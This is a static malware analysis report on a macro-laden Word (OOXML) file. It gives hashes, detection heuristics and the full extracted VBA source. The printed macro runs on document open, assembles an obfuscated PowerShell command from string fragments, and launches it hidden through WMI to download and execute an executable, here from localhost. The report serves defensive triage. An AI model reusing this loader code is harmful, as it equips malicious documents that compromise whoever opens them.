Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 73ccaefe59c3d2cb…

MALICIOUS

Office (OOXML)

24.2 KB Created: 2021-02-28 15:22:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-03-31
MD5: ba043fef016fee100b1eee46b6a708af SHA-1: 8cb9118230753ae1621bba14e33c3872262e1d05 SHA-256: 73ccaefe59c3d2cb405ea295315cd11dcb57e5ca651ff960e9e588cc2768764e
172 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        HjzYxrYoUr = CreateObject(gKoOzOCsrM() + ckOdUJFyOm()).Create(ljibHFpegx(), Null, bfeJkLKvoC(), Null)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        HjzYxrYoUr = CreateObject(gKoOzOCsrM() + ckOdUJFyOm()).Create(ljibHFpegx(), Null, bfeJkLKvoC(), Null)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2703 bytes
SHA-256: fd910c5925c452a619200c6348e62475b12e44436ddb34b5b6830b1a0defe4d8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
37 of 66 identifiers look randomly generated (e.g. 'NaKwXJDHcC') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
    MPqIGFfgQe
End Sub
Public Sub MPqIGFfgQe()
    HjzYxrYoUr = CreateObject(gKoOzOCsrM() + ckOdUJFyOm()).Create(ljibHFpegx(), Null, bfeJkLKvoC(), Null)
End Sub
Public Function gKoOzOCsrM()
    HtEXirzDzG = "win"
    nGHRKomXWo = HtEXirzDzG + "mg"
    lHhfLYDgjJ = nGHRKomXWo + "mt"
    gKoOzOCsrM = lHhfLYDgjJ + "s:"
End Function
Public Function ckOdUJFyOm()
    NaKwXJDHcC = "Win"
    xxAjvuGIQS = NaKwXJDHcC + "32_"
    IfQFLlPPvD = xxAjvuGIQS + "Pro"
    ckOdUJFyOm = IfQFLlPPvD + "cess"
End Function
Public Function ugVWzFfbpB()
    calTSpfkVf = "Star"
    ugVWzFfbpB = calTSpfkVf + "tup"
End Function
Public Function oUuNxjONfn()
    oUuNxjONfn = 1
End Function
Public Function ljibHFpegx()
    ljibHFpegx = BuidJJXNSK() + NKsCNlitrc() + XDKrxcexON() + XVRsPoxSJa() + RYCaCXThic()
End Function
Public Function BuidJJXNSK()
    stGbjpiUAZ = "POWe"
    grjnVaaOUo = stGbjpiUAZ + "RSHe"
    cBdToAJyHq = grjnVaaOUo + "lL $w"
    zgPIIxnkEg = cBdToAJyHq + "EBc ="
    BEKRlulmGQ = zgPIIxnkEg + "&('NeW"
    BuidJJXNSK = BEKRlulmGQ + "-ObJeC"
End Function
Public Function NKsCNlitrc()
    mScBozXhzA = "t')NEt.W"
    IDLnJivPFJ = mScBozXhzA + "EBCLI"
    MrfIEqunNe = IDLnJivPFJ + "eNt;$V"
    cBdToAJyHq = MrfIEqunNe + "aRi = $enV:U"
    ygjEEOEMqc = cBdToAJyHq + "SeRPRO"
    BMTvHlQwEP = ygjEEOEMqc + "FILE+'/dO"
    NKsCNlitrc = BMTvHlQwEP + "cUMENt"
End Function
Public Function XDKrxcexON()
    nIJZzopBKK = "S/Ca"
    udjyGagMEv = nIJZzopBKK + "lC.Ex"
    SEComVylOp = udjyGagMEv + "e '; $w"
    sIaygWaXnN = SEComVylOp + "Ebc.do"
    FwqHuuxDIa = sIaygWaXnN + "wNloaDF"
    iGYFcTiyRl = FwqHuuxDIa + "ILE('HTT"
    XDKrxcexON = iGYFcTiyRl + "p://l"
End Function
Public Function XVRsPoxSJa()
    dPrQYxdKJJ = "oCALh"
    HBSkQwywDh = dPrQYxdKJJ + "osT/CAl"
    mzDgwrheID = HBSkQwywDh + "c.Ex"
    jrgNOXVmno = mzDgwrheID + "e ',$Va"
    eFwDcvXCNO = jrgNOXVmno + "Ri);[dia"
    wQLXVwpNwV = eFwDcvXCNO + "gnOsTI"
    XVRsPoxSJa = wQLXVwpNwV + "c"
End Function
Public Function RYCaCXThic()
    xxxpAzaqNe = "s.Pro"
    BWjICPmmfJ = xxxpAzaqNe + "CesS]::S"
    KtNUPgpdSW = BWjICPmmfJ + "TArT($Va"
    RYCaCXThic = KtNUPgpdSW + "rI);"
End Function
Public Function bfeJkLKvoC()
    Set bfeJkLKvoC = CreateObject(gKoOzOCsrM() + ckOdUJFyOm() + ugVWzFfbpB())
    bfeJkLKvoC.ShowWindow! = oUuNxjONfn()
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 31744 bytes
SHA-256: 3b4071e2e00db53e5859d1b34faaa0aac265ea5c065de2bd3b17e2fcc829abd4